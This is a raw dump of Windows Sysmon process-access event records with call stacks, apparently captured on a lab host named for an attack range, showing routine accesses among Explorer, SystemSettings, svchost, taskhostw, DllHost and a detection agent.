12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+9b8a1|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6469e|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+188cf|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+17e53|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+241ea|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+1c5121 10341000x800000000000000042912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\SHELL32.dll+9b81d|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6469e|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+188cf|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+17e53|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+241ea|C:\Windows\ImmersiveControlPanel\SystemSettings.dll+1c5121 10341000x800000000000000042911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+9b801|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6469e 10341000x800000000000000042910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+9b801|C:\Windows\System32\SHELL32.dll+9a403|C:\Windows\System32\SHELL32.dll+9a334|C:\Windows\System32\SHELL32.dll+99dd2|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6469e|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+188cf 10341000x800000000000000042909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+d6b7a|C:\Windows\System32\SHELL32.dll+9b704|C:\Windows\System32\SHELL32.dll+9a49b|C:\Windows\System32\SHELL32.dll+99f7d|C:\Windows\System32\SHELL32.dll+99d9b|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6469e 10341000x800000000000000042908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d6b68|C:\Windows\System32\SHELL32.dll+9b704|C:\Windows\System32\SHELL32.dll+9a49b|C:\Windows\System32\SHELL32.dll+99f7d|C:\Windows\System32\SHELL32.dll+99d9b|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9 10341000x800000000000000042907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d6b68|C:\Windows\System32\SHELL32.dll+9b704|C:\Windows\System32\SHELL32.dll+9a49b|C:\Windows\System32\SHELL32.dll+99f7d|C:\Windows\System32\SHELL32.dll+99d9b|C:\Windows\System32\SystemSettings.Handlers.dll+f398|C:\Windows\System32\SystemSettings.Handlers.dll+f52e|C:\Windows\System32\SystemSettings.Handlers.dll+12df0|C:\Windows\System32\SystemSettings.Handlers.dll+69cbb|C:\Windows\System32\SystemSettings.Handlers.dll+6a31d|C:\Windows\System32\SystemSettings.Handlers.dll+6ae55|C:\Windows\System32\SystemSettings.Handlers.dll+6ae82|C:\Windows\System32\SystemSettings.Handlers.dll+6a2d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+655d4|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6474a|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+690d9|C:\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll+6469e 10341000x800000000000000042906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.055{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ac576|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.039{FE4C2B44-DDF7-63C7-B604-00000000AF02}37882252C:\Windows\system32\taskhostw.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d742|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.039{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.039{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.039{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.039{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.029{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.029{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E494-63C7-3C06-00000000AF02}4320C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.527{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002704C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+f60f|C:\Windows\System32\NPSMDesktopProvider.dll+f406|C:\Windows\System32\NPSMDesktopProvider.dll+6939|C:\Windows\System32\NPSMDesktopProvider.dll+2ba0|C:\Windows\System32\NPSMDesktopProvider.dll+272a|C:\Windows\System32\NPSMDesktopProvider.dll+2849|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.527{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002704C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+f4cc|C:\Windows\System32\NPSMDesktopProvider.dll+f406|C:\Windows\System32\NPSMDesktopProvider.dll+6939|C:\Windows\System32\NPSMDesktopProvider.dll+2ba0|C:\Windows\System32\NPSMDesktopProvider.dll+272a|C:\Windows\System32\NPSMDesktopProvider.dll+2849|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:46.527{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002704C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\NPSMDesktopProvider.dll+1be4a|C:\Windows\System32\NPSMDesktopProvider.dll+f60f|C:\Windows\System32\NPSMDesktopProvider.dll+f406|C:\Windows\System32\NPSMDesktopProvider.dll+6939|C:\Windows\System32\NPSMDesktopProvider.dll+2ba0|C:\Windows\System32\NPSMDesktopProvider.dll+272a|C:\Windows\System32\NPSMDesktopProvider.dll+2849|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 